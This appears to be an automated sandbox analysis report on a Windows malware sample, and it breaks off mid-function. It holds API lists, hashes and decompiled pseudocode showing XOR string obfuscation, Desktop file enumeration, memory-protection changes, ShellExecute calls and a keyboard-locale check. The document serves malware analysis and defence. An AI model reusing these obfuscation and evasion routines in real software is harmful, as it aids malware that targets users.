0x004049bd
0x00000000
0x00404a50
0x00404a50
0x00404a53
0x00404a56
0x00404a59
0x00404a59
0x00404a62
0x00000000
0x00404a62
0x00000000
0x00000000
0x00000000
0x004047c1
0x004047b1
0x00000000
0x004047cd
0x004047cd
0x004047ce
0x004047ce
0x00000000
0x004046d0
0x00000000
0x00000000
0x00000000
0x0040429d
0x0040428d
0x00000000
0x00000000
0x00000000
0x00403f12
0x00403f02
0x00403ef4
0x00000000

APIs

FindFirstFileA.KERNEL32(?,761B6490,00000000), ref: 00403E4D
FindNextFileA.KERNEL32(00000000,761B6490,00000000,00000000,?,?), ref: 00403F2A
FindClose.KERNEL32(00000000), ref: 00403F35
__Init_thread_footer.LIBCMT ref: 004041C5
__Init_thread_footer.LIBCMT ref: 00404363

Strings

O@K\, xrefs: 00404313
{}k|, xrefs: 00404164
\Desktop, xrefs: 004042CB
mmBK, xrefs: 0040430C

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Find$FileInit_thread_footer$CloseFirstNext
String ID: O@K\$\Desktop$mmBK${}k|
API String ID: 3881311970-1521651405
Opcode ID: 9a09e1bbe8e049ab96a913cb5bdf6a307b6eb00bb8ff8bce41e023b32a08e0aa
Instruction ID: 3f26af4df5bf6f61983eb937b93ec9e428cc9793992d79d1804842ace4f13ffb
Opcode Fuzzy Hash: 9a09e1bbe8e049ab96a913cb5bdf6a307b6eb00bb8ff8bce41e023b32a08e0aa
Instruction Fuzzy Hash: 983289B1D002448BDB04DF68DC897AEBBB1EF85308F14427EE5047B2D2D7789A85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00828217 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 537COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 008284EB
__Init_thread_footer.LIBCMT ref: 00828621
__Init_thread_footer.LIBCMT ref: 00828706
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008288FE
Concurrency::cancel_current_task.LIBCPMT ref: 00828960
Concurrency::cancel_current_task.LIBCPMT ref: 00828965

Part of subcall function 00821407: ___std_exception_copy.LIBVCRUNTIME ref: 00821445

Part of subcall function 00824F37: GetCurrentProcessId.KERNEL32(0043B054), ref: 00824F63
Part of subcall function 00824F37: GetCurrentProcessId.KERNEL32 ref: 00824F7F
Part of subcall function 00824F37: ShellExecuteA.SHELL32(00000000,00000000,00437AA0,00000000,00000000,00000000), ref: 00825020

__Init_thread_footer.LIBCMT ref: 00828A29

Strings

ZK]Z, xrefs: 00828A0C
0|C, xrefs: 0082835C
MFE., xrefs: 008285E2

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$Concurrency::cancel_current_taskCurrentProcess$ExecuteIos_base_dtorShell___std_exception_copystd::ios_base::_
String ID: 0|C$MFE.$ZK]Z
API String ID: 2568298086-2742957550
Opcode ID: 4b63aed2882a00a9b86e107fad6698c93c70bea98d92d726afc5c2131a111bcc
Instruction ID: 2d893a680220cd244575b3fa9efc181b3f29fd011a3d94a1c17606548a97ccfe
Opcode Fuzzy Hash: 4b63aed2882a00a9b86e107fad6698c93c70bea98d92d726afc5c2131a111bcc
Instruction Fuzzy Hash: F422D071900268CBDF14DF68E885BEDBBB1FF49304F1441A9E805A7282DB759AC4CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00823FD7 Relevance: 16.4, APIs: 6, Strings: 3, Instructions: 644fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,0042C074,00000000), ref: 008240B4
FindClose.KERNEL32(00000000), ref: 0082419C
__Init_thread_footer.LIBCMT ref: 0082442C
__Init_thread_footer.LIBCMT ref: 008245CA

Strings

mmBK, xrefs: 00824573
O@K\, xrefs: 0082457A
{}k|, xrefs: 008243CB

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: FindInit_thread_footer$CloseFileFirst
String ID: O@K\$mmBK${}k|
API String ID: 2663725915-1440596891
Opcode ID: ad27ea6c73be440768b34fdca8718bb21d5a5b60dd4b200e9635d10f31ba697e
Instruction ID: 17ce3be55f831b25b4ee9d2619f1c199315cef143f0ca8fb124bc50b8cbf072a
Opcode Fuzzy Hash: ad27ea6c73be440768b34fdca8718bb21d5a5b60dd4b200e9635d10f31ba697e
Instruction Fuzzy Hash: E1326571D002688BEB04DF68EC89BADBFB1FF45304F145268E414EB292D77499C5CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004024E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004024E0(void* __ebx, intOrPtr* __ecx, void** __edx) {
				signed int _v8;
				long _v12;
				char _v16;
				void* __edi;
				void* __esi;
				signed int _t31;
				long _t45;
				void* _t49;
				signed int _t60;
				signed int _t63;
				intOrPtr* _t64;
				signed int _t71;
				char _t72;
				void* _t77;
				long _t79;
				void* _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;

				_t76 = __edx;
				_t64 = __ecx;
				_t62 = __ebx;
				_t31 =  *0x43b054; // 0x41d6575c
				_v8 = _t31 ^ _t84;
				_t79 = __edx[2];
				if(_t79 == 0) {
					L8:
					return E0040D3AF(1, _t62, _v8 ^ _t84, _t76, _t79, _t80);
				} else {
					_t81 = __edx[3];
					if((_t81 & 0x02000000) == 0) {
						_t71 =  *(0x437838 + ((_t81 >> 0x1f) + ((_t81 >> 0x0000001e & 0x00000001) + (_t81 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						_t80 = _t81 & 0x04000000;
						_t44 =  ==  ? _t71 : _t71 | 0x00000200;
						_t45 = VirtualProtect( *__edx, _t79,  ==  ? _t71 : _t71 | 0x00000200,  &_v12);
						if(_t45 != 0) {
							goto L8;
						} else {
							FormatMessageA(0x1300, 0, GetLastError(), 0x400,  &_v16, _t45, _t45);
							_t72 = _v16;
							_t77 = _t72 + 1;
							do {
								_t49 =  *_t72;
								_t72 = _t72 + 1;
							} while (_t49 != 0);
							_t82 = LocalAlloc(0x40, _t72 - _t77 + 0x1f);
							E00402410(_t82, "%s: %s", "Error protecting memory page");
							OutputDebugStringA(_t82);
							LocalFree(_t82);
							LocalFree(_v16);
							return E0040D3AF(0, __ebx, _v8 ^ _t84, _t77, _t79, LocalFree, _v16);
						}
					} else {
						_t80 =  *__edx;
						if(_t80 == __edx[1]) {
							_push(__ebx);
							if(__edx[4] != 0) {
								L6:
								 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x20))))(_t80, _t79, 0x4000,  *((intOrPtr*)(_t64 + 0x34)));
							} else {
								_t63 =  *(__ecx + 0x3c);
								if( *((intOrPtr*)( *__ecx + 0x38)) == _t63) {
									goto L6;
								} else {
									_t60 = _t79;
									_t76 = _t60 % _t63;
									if(_t60 % _t63 == 0) {
										goto L6;
									}
								}
							}
							_pop(_t62);
						}
						goto L8;
					}
				}
			}

0x004024e0
0x004024e0
0x004024e0
0x004024e6
0x004024ed
0x004024f2
0x004024f7
0x0040253a
0x0040254d
0x004024f9
0x004024f9
0x00402502
0x00402569
0x0040257b
0x00402581
0x00402588
0x00402590
0x00000000
0x00402592
0x004025ab
0x004025b1
0x004025b4
0x004025b7
0x004025b7
0x004025b9
0x004025ba
0x004025cf
0x004025dc
0x004025e5
0x004025f2
0x004025f7
0x0040260a
0x0040260a
0x00402504
0x00402504
0x00402509
0x0040250f
0x00402510
0x00402526
0x00402533
0x00402512
0x00402514
0x0040251a
0x00000000
0x0040251c
0x0040251e
0x00402520
0x00402524
0x00000000
0x00000000
0x00402524
0x0040251a
0x00402538
0x00402538
0x00000000
0x00402509
0x00402502

APIs

VirtualProtect.KERNEL32(?,?,?,?,00000000,?,?,?,00402D06), ref: 00402588
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,00402D06), ref: 0040259D
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,00402D06), ref: 004025AB
LocalAlloc.KERNEL32(00000040,?,?,?,00402D06), ref: 004025C6
OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,00402D06), ref: 004025E5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00402D06), ref: 004025F2
LocalFree.KERNEL32(?,?,?,?,?,?,?,00402D06), ref: 004025F7

Strings

Error protecting memory page, xrefs: 004025D1
%s: %s, xrefs: 004025D6

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
String ID: %s: %s$Error protecting memory page
API String ID: 839691724-1484484497
Opcode ID: b081a5a94f84d8f4ae7bbe74b47554b6f7b4d40ee931c667c493b5dddc45e88e
Instruction ID: 34378c7abf07a9420a7ae90ed7d02086d04448f1cd282f7bfabeabdbba6cf552
Opcode Fuzzy Hash: b081a5a94f84d8f4ae7bbe74b47554b6f7b4d40ee931c667c493b5dddc45e88e
Instruction Fuzzy Hash: 2F310372B00104AFDB14AF99DC94FAEB768EF44304F4401BAF905AB2D1DB75AD02CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404120 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 335
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E00404120(void* __ebx, void* __ecx) {
				intOrPtr _v8;
				int _v16;
				char _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				long _v56;
				int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				long _v76;
				char _v77;
				char _v78;
				char _v84;
				long _v88;
				int _v92;
				char _v93;
				signed int _v100;
				intOrPtr _v104;
				int _v108;
				long _v112;
				int _v116;
				int _v132;
				int _v148;
				int _v156;
				char _v164;
				signed int _v172;
				char _v296;
				char _v300;
				char _v304;
				char _v552;
				intOrPtr _v1580;
				int _v1588;
				int _v1592;
				long _v1596;
				int _v1600;
				int _v1616;
				struct HKL__* _v1704;
				signed int _v1708;
				int _v1712;
				int _v1748;
				intOrPtr _v1772;
				char _v1780;
				signed int _v1784;
				intOrPtr _v1796;
				intOrPtr _v1800;
				signed int _v1804;
				intOrPtr _v1840;
				intOrPtr _v1844;
				signed int _v1896;
				char _v2146;
				short _v2148;
				int* _v2164;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t208;
				signed int _t209;
				intOrPtr _t212;
				intOrPtr _t213;
				intOrPtr* _t217;
				intOrPtr _t218;
				intOrPtr _t223;
				signed char _t224;
				signed char _t225;
				void* _t227;
				intOrPtr _t228;
				signed char _t229;
				intOrPtr _t230;
				void* _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				void* _t236;
				int _t239;
				signed int _t245;
				signed int _t246;
				signed int _t249;
				int _t252;
				intOrPtr* _t254;
				int _t258;
				int _t260;
				signed int _t266;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t278;
				signed int _t284;
				short _t286;
				signed int _t291;
				signed int _t297;
				intOrPtr _t302;
				signed char _t303;
				signed char* _t304;
				void* _t309;
				long _t310;
				intOrPtr _t311;
				int _t312;
				intOrPtr _t316;
				intOrPtr _t317;
				int _t318;
				int _t322;
				void* _t326;
				signed int _t327;
				void* _t333;
				int _t350;
				signed int _t355;
				void* _t361;
				int* _t363;
				signed int _t365;
				int _t366;
				void* _t367;
				void* _t369;
				intOrPtr* _t370;
				intOrPtr* _t373;
				signed char* _t377;
				intOrPtr* _t381;
				intOrPtr* _t385;
				int _t393;
				signed int _t399;
				int _t401;
				int _t404;
				signed int* _t405;
				signed int _t415;
				intOrPtr* _t416;
				signed int _t422;
				int _t426;
				void* _t427;
				long _t429;
				int* _t431;
				int* _t432;
				int* _t433;
				long _t434;
				void* _t435;
				void* _t439;
				signed char* _t440;
				void* _t441;
				int _t443;
				void* _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				void* _t448;
				int* _t449;
				void* _t450;
				void* _t451;
				int _t452;
				signed char* _t453;
				void* _t454;
				void* _t455;
				void* _t456;
				int _t457;
				void* _t458;
				void* _t459;
				signed int _t460;
				void* _t462;
				void* _t463;
				int _t464;
				void* _t467;
				signed int _t470;
				signed int _t473;
				signed int _t475;
				signed int _t477;
				void* _t479;
				signed int _t482;
				void* _t483;
				int* _t484;
				int* _t485;
				int* _t486;
				int* _t487;
				int* _t488;
				int* _t489;
				signed int _t495;
				signed int _t496;
				void* _t499;
				signed int _t501;

				_t369 = __ecx;
				_push(__ebx);
				_t361 = _t479;
				_t482 = (_t479 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t361 + 4));
				_t470 = _t482;
				_push(0xffffffff);
				_push(0x42ace5);
				_push( *[fs:0x0]);
				_push(_t361);
				_t483 = _t482 - 0x50;
				_t208 =  *0x43b054; // 0x41d6575c
				_t209 = _t208 ^ _t470;
				_v32 = _t209;
				_push(_t451);
				_push(_t209);
				 *[fs:0x0] =  &_v24;
				_v48 = 0x7c6b7d7b;
				_v44 = 0x68617c7e;
				_v40 = 0x2e6b6267;
				_t443 =  *( *[fs:0x2c]);
				_t212 =  *0x43cf94; // 0x0
				if(_t212 >  *((intOrPtr*)(_t443 + 4))) {
					E0040D738(_t212, 0x43cf94);
					_t483 = _t483 + 4;
					_t512 =  *0x43cf94 - 0xffffffff;
					if( *0x43cf94 == 0xffffffff) {
						asm("movq xmm0, [ebp-0x24]");
						asm("movq [0x43cd8c], xmm0");
						 *0x43cd94 = _v40;
						E0040DA4A(_t369, _t512, 0x42b4f0);
						E0040D6EE(0x43cf94);
						_t483 = _t483 + 8;
					}
				}
				if( *0x43cd97 != 0) {
					_t355 = 0;
					do {
						 *(_t355 + 0x43cd8c) =  *(_t355 + 0x43cd8c) ^ 0x0000002e;
						_t355 = _t355 + 1;
					} while (_t355 < 0xc);
				}
				_t370 = 0x43cd8c;
				_v108 = 0;
				_v92 = 0;
				_v88 = 0xf;
				_v108 = 0;
				_t16 = _t370 + 1; // 0x43cd8d
				_t427 = _t16;
				do {
					_t213 =  *_t370;
					_t370 = _t370 + 1;
				} while (_t213 != 0);
				_push(_t370 - _t427);
				E00402030( &_v108, 0x43cd8c);
				_v16 = 0;
				_t216 =  >=  ? _v108 :  &_v108;
				_t217 = E00417335(_t361, _t443, _t451, _v88 - 0x10,  >=  ? _v108 :  &_v108);
				_t428 = _t217;
				_v76 = 0;
				_t373 = _t217;
				_v60 = 0;
				_t484 = _t483 + 4;
				_v56 = 0xf;
				_v76 = 0;
				_t26 = _t373 + 1; // 0x1
				_t452 = _t26;
				do {
					_t218 =  *_t373;
					_t373 = _t373 + 1;
				} while (_t218 != 0);
				_push(_t373 - _t452);
				E00402030( &_v76, _t428);
				_v16 = 2;
				_t429 = _v88;
				if(_t429 < 0x10) {
					L14:
					_t376 = _v60;
					_v92 = 0;
					_v88 = 0xf;
					_v108 = 0;
					_push(8);
					_push("\\Desktop");
					if(_v56 - _t376 < 8) {
						_v84 = 0;
						_t376 =  &_v76;
						_push(_v84);
						_push(8);
						E00402270(_t361,  &_v76, _t443, _t452);
					} else {
						_t38 = _t376 + 8; // 0x8
						_t466 =  >=  ? _v76 :  &_v76;
						_t467 = ( >=  ? _v76 :  &_v76) + _t376;
						_v60 = _t38;
						_push(_t467);
						E0040ECB0();
						_t484 =  &(_t484[3]);
						 *((char*)(_t467 + 8)) = 0;
					}
					_t223 =  *0x43ced8; // 0x0
					_v44 = 0x4b426d6d;
					_v40 = 0x5c4b404f;
					_v77 = 0x2e;
					if(_t223 >  *((intOrPtr*)(_t443 + 4))) {
						E0040D738(_t223, 0x43ced8);
						_t484 =  &(_t484[1]);
						_t525 =  *0x43ced8 - 0xffffffff;
						if( *0x43ced8 == 0xffffffff) {
							asm("movq xmm0, [ebp-0x20]");
							asm("movq [0x43cd14], xmm0");
							 *0x43cd1c = _v77;
							E0040DA4A(_t376, _t525, 0x42b4d0);
							E0040D6EE(0x43ced8);
							_t484 =  &(_t484[2]);
						}
					}
					_t224 =  *0x43cd1c; // 0x0
					if(_t224 != 0) {
						 *0x43cd14 =  *0x43cd14 ^ 0x0000002e;
						 *0x43cd15 =  *0x43cd15 ^ 0x0000002e;
						 *0x43cd16 =  *0x43cd16 ^ 0x0000002e;
						 *0x43cd17 =  *0x43cd17 ^ 0x0000002e;
						 *0x43cd18 =  *0x43cd18 ^ 0x0000002e;
						 *0x43cd19 =  *0x43cd19 ^ 0x0000002e;
						 *0x43cd1a =  *0x43cd1a ^ 0x0000002e;
						 *0x43cd1b =  *0x43cd1b ^ 0x0000002e;
						 *0x43cd1c = _t224 ^ 0x0000002e;
					}
					_t485 = _t484 - 0x18;
					_t377 = 0x43cd14;
					_t431 = _t485;
					_t50 =  &(_t377[1]); // 0x43cd15
					_t453 = _t50;
					 *_t431 = 0;
					_t431[4] = 0;
					_t431[5] = 0xf;
					do {
						_t225 =  *_t377;
						_t377 =  &(_t377[1]);
					} while (_t225 != 0);
					_push(_t377 - _t453);
					E00402030(_t431, 0x43cd14);
					_t227 = E00403D70(_t361,  &_v76);
					_t486 =  &(_t485[6]);
					_v77 = 0x2e;
					_t228 =  *0x43cd5c; // 0x0
					_v78 = _t227 != 0;
					if(_t228 >  *((intOrPtr*)(_t443 + 4))) {
						E0040D738(_t228, 0x43cd5c);
						_t486 =  &(_t486[1]);
						_t531 =  *0x43cd5c - 0xffffffff;
						if( *0x43cd5c == 0xffffffff) {
							asm("movaps xmm0, [0x437da0]");
							asm("movups [0x43cdd8], xmm0");
							 *0x43cde8 = _v77;
							E0040DA4A( &_v76, _t531, 0x42b4b0);
							E0040D6EE(0x43cd5c);
							_t486 =  &(_t486[2]);
						}
					}
					_t229 =  *0x43cde8; // 0x0
					if(_t229 != 0) {
						asm("movups xmm0, [0x43cdd8]");
						asm("movaps xmm1, [0x437d50]");
						asm("pxor xmm1, xmm0");
						 *0x43cde8 = _t229 ^ 0x0000002e;
						asm("movups [0x43cdd8], xmm1");
					}
					_t487 = _t486 - 0x18;
					_t381 = 0x43cdd8;
					_t432 = _t487;
					_t58 = _t381 + 1; // 0x43cdd9
					_t454 = _t58;
					 *_t432 = 0;
					_t432[4] = 0;
					_t432[5] = 0xf;
					do {
						_t230 =  *_t381;
						_t381 = _t381 + 1;
					} while (_t230 != 0);
					_push(_t381 - _t454);
					E00402030(_t432, 0x43cdd8);
					_t232 = E00403D70(_t361,  &_v76);
					_t488 =  &(_t487[6]);
					_v36 = 0x2e6d;
					_t233 =  *0x43cef0; // 0x0
					_v77 = _t232 != 0;
					if(_t233 >  *((intOrPtr*)(_t443 + 4))) {
						E0040D738(_t233, 0x43cef0);
						_t488 =  &(_t488[1]);
						_t536 =  *0x43cef0 - 0xffffffff;
						if( *0x43cef0 == 0xffffffff) {
							asm("movaps xmm0, [0x437db0]");
							asm("movups [0x43cd74], xmm0");
							 *0x43cd84 = _v36;
							E0040DA4A( &_v76, _t536, 0x42b490);
							E0040D6EE(0x43cef0);
							_t488 =  &(_t488[2]);
						}
					}
					if( *0x43cd85 != 0) {
						asm("movups xmm0, [0x43cd74]");
						_t333 = 0x10;
						asm("movaps xmm1, [0x437d50]");
						asm("pxor xmm1, xmm0");
						asm("movups [0x43cd74], xmm1");
						do {
							 *(_t333 + 0x43cd74) =  *(_t333 + 0x43cd74) ^ 0x0000002e;
							_t333 = _t333 + 1;
						} while (_t333 < 0x12);
					}
					_t489 = _t488 - 0x18;
					_t385 = 0x43cd74;
					_t433 = _t489;
					_t68 = _t385 + 1; // 0x43cd75
					_t455 = _t68;
					 *_t433 = 0;
					_t433[4] = 0;
					_t433[5] = 0xf;
					do {
						_t234 =  *_t385;
						_t385 = _t385 + 1;
					} while (_t234 != 0);
					_push(_t385 - _t455);
					E00402030(_t433, 0x43cd74);
					_t236 = E00403D70(_t361,  &_v76);
					_t484 =  &(_t489[6]);
					if(_t236 == 0 || _v78 == 0 || _v77 == 0) {
						_t452 = 0;
						__eflags = 0;
					} else {
						_t452 = 1;
					}
					_t434 = _v56;
					if(_t434 < 0x10) {
						L48:
						 *[fs:0x0] = _v24;
						_pop(_t444);
						_pop(_t456);
						return E0040D3AF(_t452, _t361, _v32 ^ _t470, _t434, _t444, _t456);
					} else {
						_t393 = _v76;
						_t434 = _t434 + 1;
						_t239 = _t393;
						if(_t434 < 0x1000) {
							L47:
							_push(_t434);
							E0040D5EF(_t393);
							goto L48;
						} else {
							_t393 =  *(_t393 - 4);
							_t434 = _t434 + 0x23;
							if(_t239 - _t393 + 0xfffffffc > 0x1f) {
								goto L50;
							} else {
								goto L47;
							}
						}
					}
				} else {
					_t426 = _v108;
					_t441 = _t429 + 1;
					_t350 = _t426;
					if(_t441 < 0x1000) {
						L13:
						_push(_t441);
						E0040D5EF(_t426);
						_t484 =  &(_t484[2]);
						goto L14;
					} else {
						_t393 =  *(_t426 - 4);
						_t434 = _t441 + 0x23;
						if(_t350 - _t393 + 0xfffffffc > 0x1f) {
							E00411D17(_t361, _t393, _t434, __eflags);
							L50:
							E00411D17(_t361, _t393, _t434, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t361);
							_t363 = _t484;
							_t495 = (_t484 - 0x00000008 & 0xfffffff8) + 4;
							_push(_t470);
							_v148 = _t363[1];
							_t473 = _t495;
							_push(0xffffffff);
							_push(0x42ad42);
							_push( *[fs:0x0]);
							_push(_t363);
							_t496 = _t495 - 0x630;
							_t245 =  *0x43b054; // 0x41d6575c
							_t246 = _t245 ^ _t473;
							_v172 = _t246;
							_push(_t452);
							_push(_t443);
							_push(_t246);
							 *[fs:0x0] =  &_v164;
							_t457 = _t393;
							_v1708 = _t457;
							_v1748 = _t457;
							asm("xorps xmm0, xmm0");
							_v1712 = 0;
							asm("movq [esi], xmm0");
							 *(_t457 + 8) = 0;
							 *_t457 = 0;
							 *(_t457 + 4) = 0;
							 *(_t457 + 8) = 0;
							_v156 = 0;
							_v1712 = 1;
							_t249 = GetKeyboardLayoutList(0x400,  &_v1704);
							_t445 = 0;
							_v1708 = _t249;
							__eflags = _t249;
							if(_t249 <= 0) {
								L63:
								 *[fs:0x0] = _v36;
								_pop(_t446);
								_pop(_t458);
								__eflags = _v44 ^ _t473;
								return E0040D3AF(_t457, _t363, _v44 ^ _t473, _t434, _t446, _t458);
							} else {
								do {
									_t252 =  *(_t473 + _t445 * 4 - 0x610) & 0x0000ffff;
									_v1588 = _t252;
									GetLocaleInfoA(_t252, 2,  &_v552, 0x1f4);
									_t254 =  &_v552;
									_v1616 = 0;
									_v1600 = 0;
									_t435 = _t254 + 1;
									_v1596 = 0xf;
									_v1616 = 0;
									do {
										_t399 =  *_t254;
										_t254 = _t254 + 1;
										__eflags = _t399;
									} while (_t399 != 0);
									_push(_t254 - _t435);
									E00402030( &_v1616,  &_v552);
									_t401 = _v1588;
									_v1592 = _t401;
									_v28 = 1;
									_t258 =  *(_t457 + 4);
									__eflags = _t258 -  *(_t457 + 8);
									if(_t258 ==  *(_t457 + 8)) {
										_push( &_v1616);
										_push(_t258);
										E0040B430(_t363, _t457, _t445, _t457);
										_t434 = _v1596;
									} else {
										asm("movups xmm0, [ebp-0x638]");
										_t434 = 0xf;
										_v1616 = 0;
										asm("movups [eax], xmm0");
										asm("movq xmm0, [ebp-0x628]");
										asm("movq [eax+0x10], xmm0");
										 *(_t258 + 0x18) = _t401;
										 *(_t457 + 4) =  *(_t457 + 4) + 0x1c;
									}
									_v28 = 0;
									__eflags = _t434 - 0x10;
									if(_t434 < 0x10) {
										goto L62;
									} else {
										_t404 = _v1616;
										_t434 = _t434 + 1;
										_t260 = _t404;
										__eflags = _t434 - 0x1000;
										if(_t434 < 0x1000) {
											L61:
											_push(_t434);
											E0040D5EF(_t404);
											_t496 = _t496 + 8;
											goto L62;
										} else {
											_t404 =  *(_t404 - 4);
											_t434 = _t434 + 0x23;
											__eflags = _t260 - _t404 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												E00411D17(_t363, _t404, _t434, __eflags);
												asm("int3");
												_push(_t473);
												_t475 = _t496;
												_push(0xffffffff);
												_push(0x42ad85);
												_push( *[fs:0x0]);
												_t499 = _t496 - 0x5c;
												_t266 =  *0x43b054; // 0x41d6575c
												_t267 = _t266 ^ _t475;
												_v1784 = _t267;
												_push(_t363);
												_push(_t457);
												_push(_t445);
												_push(_t267);
												 *[fs:0x0] =  &_v1780;
												_t365 = 0;
												_t405 =  &_v1804;
												asm("xorps xmm0, xmm0");
												_v1840 = 0;
												asm("movq [ebp-0x24], xmm0");
												_v1796 = 0;
												L51();
												_v1772 = 0;
												_t269 = _v1800;
												_t447 = _v1804;
												_v1844 = _t269;
												__eflags = _t447 - _t269;
												if(_t447 == _t269) {
													L92:
													_t366 = 0;
													__eflags = 0;
													goto L93;
												} else {
													_v52 = 0x5d5d5b7c;
													_v48 = 0x2e404f47;
													_t464 =  *( *[fs:0x2c]);
													_v108 = _t464;
													do {
														E0040A490(_t365,  &_v92, _t434, _t447, _t447);
														_v68 =  *((intOrPtr*)(_t447 + 0x18));
														_v32 = 1;
														_t302 =  *0x43ce9c; // 0x0
														__eflags = _t302 -  *((intOrPtr*)(_t464 + 4));
														if(_t302 >  *((intOrPtr*)(_t464 + 4))) {
															E0040D738(_t302, 0x43ce9c);
															_t499 = _t499 + 4;
															__eflags =  *0x43ce9c - 0xffffffff;
															if(__eflags == 0) {
																_t140 =  &_v52; // 0x5d5d5b7c
																 *0x43ce6c =  *_t140;
																_t141 =  &_v48; // 0x2e404f47
																 *0x43ce70 =  *_t141;
																E0040DA4A( &_v92, __eflags, 0x42b510);
																E0040D6EE(0x43ce9c);
																_t499 = _t499 + 8;
															}
														}
														_t303 =  *0x43ce73; // 0x0
														__eflags = _t303;
														if(_t303 != 0) {
															 *0x43ce6c =  *0x43ce6c ^ 0x0000002e;
															 *0x43ce6d =  *0x43ce6d ^ 0x0000002e;
															 *0x43ce6e =  *0x43ce6e ^ 0x0000002e;
															 *0x43ce6f =  *0x43ce6f ^ 0x0000002e;
															 *0x43ce70 =  *0x43ce70 ^ 0x0000002e;
															 *0x43ce71 =  *0x43ce71 ^ 0x0000002e;
															 *0x43ce72 =  *0x43ce72 ^ 0x0000002e;
															_t327 = _t303 ^ 0x0000002e;
															__eflags = _t327;
															 *0x43ce73 = _t327;
														}
														_t304 = 0x43ce6c;
														_v132 = 0;
														_v116 = 0;
														_v112 = 0xf;
														_t145 =  &(_t304[1]); // 0x43ce6d
														_t440 = _t145;
														do {
															_t422 =  *_t304;
															_t304 =  &(_t304[1]);
															__eflags = _t422;
														} while (_t422 != 0);
														_push(_t304 - _t440);
														E00402030( &_v132, 0x43ce6c);
														_t457 = _v92;
														_t434 = _v76;
														__eflags = _v112 - 0x10;
														_v100 = _t365 | 0x00000001;
														_t366 = _v132;
														_t308 =  >=  ? _t366 :  &_v132;
														__eflags = _v72 - 0x10;
														_t405 =  >=  ? _t457 :  &_v92;
														_t309 = E00402180(_t405, _t434, _t405,  >=  ? _t366 :  &_v132, _v116);
														_t499 = _t499 + 0xc;
														__eflags = _t309 - 0xffffffff;
														if(_t309 != 0xffffffff) {
															L76:
															_v93 = 1;
														} else {
															__eflags = _v72 - 0x10;
															_t434 = _v76;
															_t405 =  >=  ? _t457 :  &_v92;
															_t326 = E00402180(_t405, _t434, _t405, 0x437a5c, 7);
															_t499 = _t499 + 0xc;
															_v93 = 0;
															__eflags = _t326 - 0xffffffff;
															if(_t326 != 0xffffffff) {
																goto L76;
															}
														}
														_v100 = _v100 & 0xfffffffe;
														_t310 = _v112;
														__eflags = _t310 - 0x10;
														if(_t310 < 0x10) {
															L81:
															__eflags = _v93;
															if(_v93 != 0) {
																L97:
																_t311 = _v72;
																__eflags = _t311 - 0x10;
																if(_t311 < 0x10) {
																	L101:
																	_t447 = _v64;
																	_t366 = 1;
																	L93:
																	__eflags = _t447;
																	if(_t447 == 0) {
																		L103:
																		 *[fs:0x0] = _v40;
																		_pop(_t448);
																		_pop(_t459);
																		_pop(_t367);
																		__eflags = _v44 ^ _t475;
																		return E0040D3AF(_t366, _t367, _v44 ^ _t475, _t434, _t448, _t459);
																	} else {
																		_push(_t405);
																		E0040BB70(_t366, _t447, _v60, _t447, _t457);
																		_t460 = _v64;
																		_t501 = _t499 + 4;
																		_t434 = (0x92492493 * (_v56 - _t460) >> 0x20) + _v56 - _t460 >> 4;
																		_t278 = _t460;
																		_t415 = ((_t434 >> 0x1f) + _t434) * 8 - (_t434 >> 0x1f) + _t434 << 2;
																		__eflags = _t415 - 0x1000;
																		if(_t415 < 0x1000) {
																			L102:
																			_push(_t415);
																			E0040D5EF(_t460);
																			goto L103;
																		} else {
																			_t460 =  *((intOrPtr*)(_t460 - 4));
																			_t415 = _t415 + 0x23;
																			__eflags = _t278 - _t460 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
